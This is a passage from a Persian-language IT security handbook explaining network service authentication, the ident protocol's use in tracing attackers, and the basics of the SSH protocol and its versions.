‫ﺑﺪﺭﺳﺘﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎﺷﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫‪٤٠٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺮﺍﻱ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ‪ DNS .‬ﺍﺯ ﺍﻣﻀﺎﻱ ﺭﻣﺰﺷﺪﺓ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻭ ﺗﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻙ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻗﺎﺩﺭﻧﺪ ﻓﺮﺳﺘﻨﺪﮔﺎﻥ‬
‫ﻣﻌﺘﺒﺮ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ SMTP AUTH‬ﺑﺮﺍﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ ﻭ ﭘﻴﺎﻣﻬﺎﻱ ﺷﺒﮑﻪﻫﺎﻱ ﺧﺒﺮﻱ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺑﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ PGP‬ﺍﻣﻀﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﺮﻭﺯ ﻛﺎﺭﺑﺮﺩ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﭼﻨﺪﺍﻥ ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ‪.‬‬
‫‪ IPsec‬ﻛﻪ ﺩﺭ ﺑﺎﻻ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﺍﻣﻜﺎﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ .‬ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ‬
‫ﺗﺮﺍﻓﻴﻚ ‪ IP‬ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ‪ VPN‬ﺍﻳﻨﭽﻨﻴﻨﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ﺍﺯ ﻫﻤﺎﻥ ﻣﻨﺒﻌﻲ ﺑﺎﺷﺪ ﻛﻪ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﺧﺪﻣﺎﺕ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ‪ VPN‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﺷﻮﺩ‪.‬‬

‫‪ident‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﺁﻧﺠﺎ ﻧﺎﺷﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﭘﺮﻭﺗﻜﻞ ‪ TCP/IP‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ﻭ‬
‫ﻧﻪ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻳﻚ ﺍﺗﺼﺎﻝ ‪ TCP/IP‬ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺁﺩﺭﺱ ‪ IP‬ﺁﻧﺮﺍ ﻣﻲﺩﺍﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻦ‬
‫ﻭﺟﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻧﺎﻡ ﺷﺨﺼﻲ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ‪ TCP/IP‬ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺩﺭ ﺩﺳﺖ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﭘﺮﻭﺗﻜﻞ ‪ TCP/IP‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻧﻴﺎﺯﻱ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﻛﻠﻲ ﺍﺣﺴﺎﺱ ﻧﻤﻲﺷﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ ﻧﺎﻡ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺗﺼﺎﻟﻬﺎﻱ‬
‫‪ TCP/IP‬ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﻧﺪ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ‪ ،‬ﻭ ﺍﻳﻨﻜﺎﺭ ﺑﻌﺪﻫﺎ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺍﻟﺰﺍﻣﻲ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‬
‫‪ (FTP ،SMTP‬ﻋﻤﻠﻲ ﺷﺪ‪ .‬ﺑﺎ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﻣﺪﻳﺮﺍﻥ ﺷﺒﻜﻪﻫﺎ ﺩﻟﻴﻞ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺎﻡ ﺁﻏﺎﺯﮔﺮﺍﻥ ﺍﺗﺼﺎﻻﺕ ‪ TCP/IP‬ﭘﻴﺪﺍ ﻛﺮﺩﻧﺪ؛ ﻭ‬
‫ﺁﻥ ﺩﻟﻴﻞ ﭼﻴﺰﻱ ﻧﺒﻮﺩ ﺟﺰ "ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ"‪ .‬ﺍﮔﺮ ﺭﺍﻫﺒﺮ ﺭﺍﻩ ﺩﻭﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻮﺟﻪ ﺷﻮﺩ ﻛﻪ ﺩﺭ ﺳﺎﻋﺖ ‪ ١٧:٠٠‬ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ‬
‫ﻧﺎﻡ ‪ fas.harvard.edu‬ﺭﺍﻳﺎﻧﺔ ﺍﻭ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ‪ ،‬ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺍﻳﻦ ﺣﻤﻠﻪ ﺭﺍ ﺭﺩﮔﻴﺮﻱ ﻛﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﻭ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺴﺌﻮﻝ‬
‫ﺣﻤﻠﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﺪ‪ ،‬ﺗﺎ ﺁﻥ ﻛﺎﺭﺑﺮ ﺗﻨﺒﻴﻪ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺴﺪﻭﺩ ﮔﺮﺩﺩ‪.‬‬
‫ﭘﺮﻭﺗﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﺓ ﺗﻤﺎﺱ ﻣﻌﻜﻮﺱ‪ ،‬ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻗﺼﺪ‬
‫ﺩﺍﺭﺩ ﭘﻲ ﺑﻪ ﻧﺎﻡ ﻭﺍﻗﻌﻲ ﺁﻏﺎﺯﮔﺮ ﺍﺗﺼﺎﻝ ‪ TCP/IP‬ﺑﺒﺮﺩ‪ ،‬ﺍﺑﺘﺪﺍ ﻳﻚ ﺍﺗﺼﺎﻝ ﺑﺎ ‪ (identd) ident daemon‬ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﺑﺮﻗﺮﺍﺭ ﺳﺎﺧﺘﻪ ﻭ ﺗﻮﺻﻴﻔﻲ ﺍﺯ ﺍﺗﺼﺎﻝ ‪ TCP/IP‬ﺟﺎﺭﻱ ﺑﻪ ﺁﻥ ﻣﻲﻓﺮﺳﺘﺪ؛ ﻭ ﺳﭙﺲ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻧﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺁﻏﺎﺯﮔﺮ ﺍﺗﺼﺎﻝ ﺭﺍ ﺩﺭ‬
‫ﻗﺎﻟﺐ ﻳﻚ ﻓﺎﻳﻞ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﺩﺭ ﮔﺬﺷﺘﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﭘﺎﺳﺦ ﺳﻴﺴﺘﻢ ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺍﺧﻴﺮ ‪identd‬‬
‫ﺍﻣﻜﺎﻥ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻥ ﻳﻚ ﻧﺸﺎﻥ ﺭﻣﺰﺷﺪﻩ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻧﺸﺎﻥ ﭘﺲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺑﺎ‬
‫ﻣﺸﺎﺭﻛﺖ ﺳﺎﻳﺖ ﺍﺟﺮﺍﻛﻨﻨﺪﻩ ‪ identd‬ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﺑﺎ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ identd‬ﻭ ﺑﺪﻭﻥ ﻣﺸﺎﺭﻛﺖ ﺧﻮﺩ ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﻣﻲﺷﻮﺩ‪.‬‬


‫ﻋﻤﻠﻜﺮﺩ ﭘﺮﻭﺗﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺗﺎ ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﺴﺘﮕﻲ ﺑﻪ ﺻﺪﺍﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺁﻏﺎﺯﮔﺮ ﺍﺗﺼﺎﻝ ‪ TCP/IP‬ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﺳﻴﺴﺘﻢ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ‬
‫ﻛﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺣﻤﻠﻪ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ ‪ identd‬ﺍﺭﺯﺷﻤﻨﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻑ ﻳﻚ‬
‫ﺭﺍﻳﺎﻧﺔ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻓﺎﻗﺪ ﺳﻴﺴﺘﻢ ‪ identd‬ﺍﺳﺖ ﻭ ﻳﺎ ﺍﮔﺮ ﺍﺯ ‪ identd‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻏﻠﻂ ﻭ‬
‫ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﻣﻲﺩﻫﺪ‪ ،‬ﭘﺎﺳﺦ ﻓﺎﻗﺪ ﺍﺭﺯﺵ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺰﺭﮒ ﮔﻔﺘﮕﻮﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ‬
‫ﺍﺟﺮﺍﻱ ﻳﻚ ‪ ident daemon‬ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻟﺬﺍ "‪"ident daemon‬ﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﭘﺎﺳﺨﻬﺎﻱ ﺟﻌﻠﻲ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﭘﺎﺳﺨﻬﺎﻱ ‪ identd‬ﺑﻴﺶ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻲ ﮐﻪ ﭘﺎﺳﺦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﮐﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻫﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﭘﺎﺳﺦ ﺭﺍ‬
‫ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺛﺒﺖ ‪query‬ﻫﺎﻱ ‪ identd‬ﺑﻪ ﺷﻤﺎ ﻛﻤﻜﻲ ﻧﻜﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﮐﻤﮑﻲ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺑﺎﺷﺪ ‪ -‬ﺍﻳﻦ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ ﻛﺸﻒ ﺁﻥ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺩﺭ ﺣﻤﻠﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺷﺮﻛﺖ ﺩﺍﺷﺘﻪ ﺍﺳﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ‬
‫ﺧﺼﻮﺻﹰﺎ ﺯﻣﺎﻧﻲ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﭘﺎﻙ ﻛﺮﺩﻩ ﻭ ﻳﺎ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻣﺒﺪﺃ ﺻﺪﻣﻪ ﻭﺍﺭﺩ ﺁﻭﺭﺩﻩ ﺑﺎﺷﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠٦‬‬

‫ﺑﻴﺸﺘﺮﻳﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ identd‬ﺩﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻧﻲ ﺑﻮﺩﻩ ﻛﻪ ﺣﻤﻼﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ‬
‫ﺑﺰﺭﮒ ﻭ ﭼﻨﺪﻛﺎﺭﺑﺮﺓ ‪ Unix‬ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻩﺍﻧﺪ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺭﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﻭﻥ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗﻌﺎﻣﻠﻲ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪Unix‬‬
‫ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺭﺩﻳﺎﺑﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺩﺭﮔﻴﺮ ﺩﺭ ﺭﺧﺪﺍﺩ‪ identd ،‬ﺭﺍ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ‪.‬‬

‫ﭘﻮﺳﺘﺔ ﺍﻣﻦ )‪(SSH‬‬


‫‪ SSH‬ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺗﻮﺳﻂ ﺗﺎﺗﻮ ﺍﻳﻠﻮﻧﻦ‪ ٢٩٧‬ﺷﻜﻞ ﮔﺮﻓﺖ ﭘﺮﻭﺗﻜﻠﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﻭ‬
‫ﺗﻮﻧﻞ ﺯﺩﻥ ﺍﺗﺼﺎﻝ ‪ TCP‬ﺍﺳﺖ )ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ‪ SSH‬ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﻫﺪﺍﻳﺖ ﭘﻮﺭﺕ" ﻧﻴﺰ ﻣﻲﺷﻨﺎﺳﻨﺪ(‪ .‬ﺍﮔﺮﭼﻪ ﭘﺮﻭﺗﻜﻞ ‪ SSH‬ﺩﺭ ﺍﺑﺘﺪﺍ ﻓﻘﻂ ﺑﺼﻮﺭﺕ ﻳﻚ‬
‫ﺍﺑﺰﺍﺭ ﺩﺭ ﺧﻂ ﻓﺮﻣﺎﻥ ‪ Unix‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﺍﻣﺮﻭﺯﻩ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺗﻮﺳﻂ ﺩﻫﻬﺎ ﺑﺮﻧﺎﻣﻪ ﻭ ﺭﻭﻱ ﺑﺴﺘﺮﻫﺎﻱ‬
‫ﮔﻮﻧﺎﮔﻮﻥ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ‪ SSH‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ‪ SSH‬ﺍﻭﻟﻴﺔ ﺍﻳﻠﻮﻧﻦ‪ ،‬ﻭ ﻧﻴﺰ ‪ OpenSSH‬ﻛﻪ ﺩﺭ ﭘﺮﻭﮊﺓ‬
‫‪ Open-BSD‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﺠﺎﺭﻱ ‪ SSH‬ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪.‬‬
‫‪ SSH‬ﺑﻪ ﻳﻚ ﻗﺴﻤﺖ ﺣﻴﺎﺗﻲ ﺯﻳﺮﺑﻨﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ؛ ﭼﺮﺍﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎﻳﮕﺰﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺷﻮﺩ ﻛﻪ‬
‫ﻫﻤﮕﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫﻨﺪ )ﺍﺯ ﺟﻤﻠﻪ ‪ rdist ،rcp ،rsh ،rlogin ،telnet‬ﻭ ‪ .(ftp‬ﺑﻌﻼﻭﻩ ﻗﺎﺑﻠﻴﺖ ﺗﻮﻧﻞ ﺯﺩﻥ‬
‫ﺍﺗﺼﺎﻝ ‪ TCP‬ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ SSH‬ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﺔ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ ﺭﺍ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ SSH .‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﺨﺼﻮﺻﻲ‬
‫ﺑﺮﺍﻱ ﺗﻮﻧﻞ ﺯﺩﻥ ﭘﺮﻭﺗﻜﻞ ‪ X-Windows‬ﺩﺍﺭﺩ‪.‬‬
‫ﺩﻭ ﻧﺴﺨﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪ SSH‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﻫﺮ ﺩﻭﻱ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﺍﺟﺎﺯﺓ ﺗﺒﺎﺩﻝ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻧﺴﺨﺔ ﺍﻭﻝ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻭ ﺗﺒﺎﺩﻝ ﺍﻭﻟﻴﺔ ﻛﻠﻴﺪ‪ ،‬ﺑﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ‪ RSA‬ﻭ ﺗﺒﺎﺩﻝ ﻛﻠﻴﺪ ﺍﻭﻟﻴﻪ ﻣﺒﺘﻨﻲ ﺍﺳﺖ ﻭ ﻧﺴﺨﺔ ﺩﻭﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ‪ DSA‬ﻭ ‪ RSA‬ﭘﺮﻭﺗﻜﻞ ﺭﺍ ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻌﺎﻳﺐ ﻧﺴﺨﺔ ﺍﻭﻝ ﺭﺍ ﻧﻴﺰ ﺍﺻﻼﺡ ﻛﺮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﺔ ﺩﻭﻡ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻴﺰﺑﺎﻥ ﺗﻮﺳﻂ ‪SSH‬‬

‫ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻣﻴﺰﺑﺎﻥ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSH‬ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ‪ ،‬ﺯﻭﺝ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ‪ RSA‬ﺧﺎﺹ ﺧﻮﺩ‬
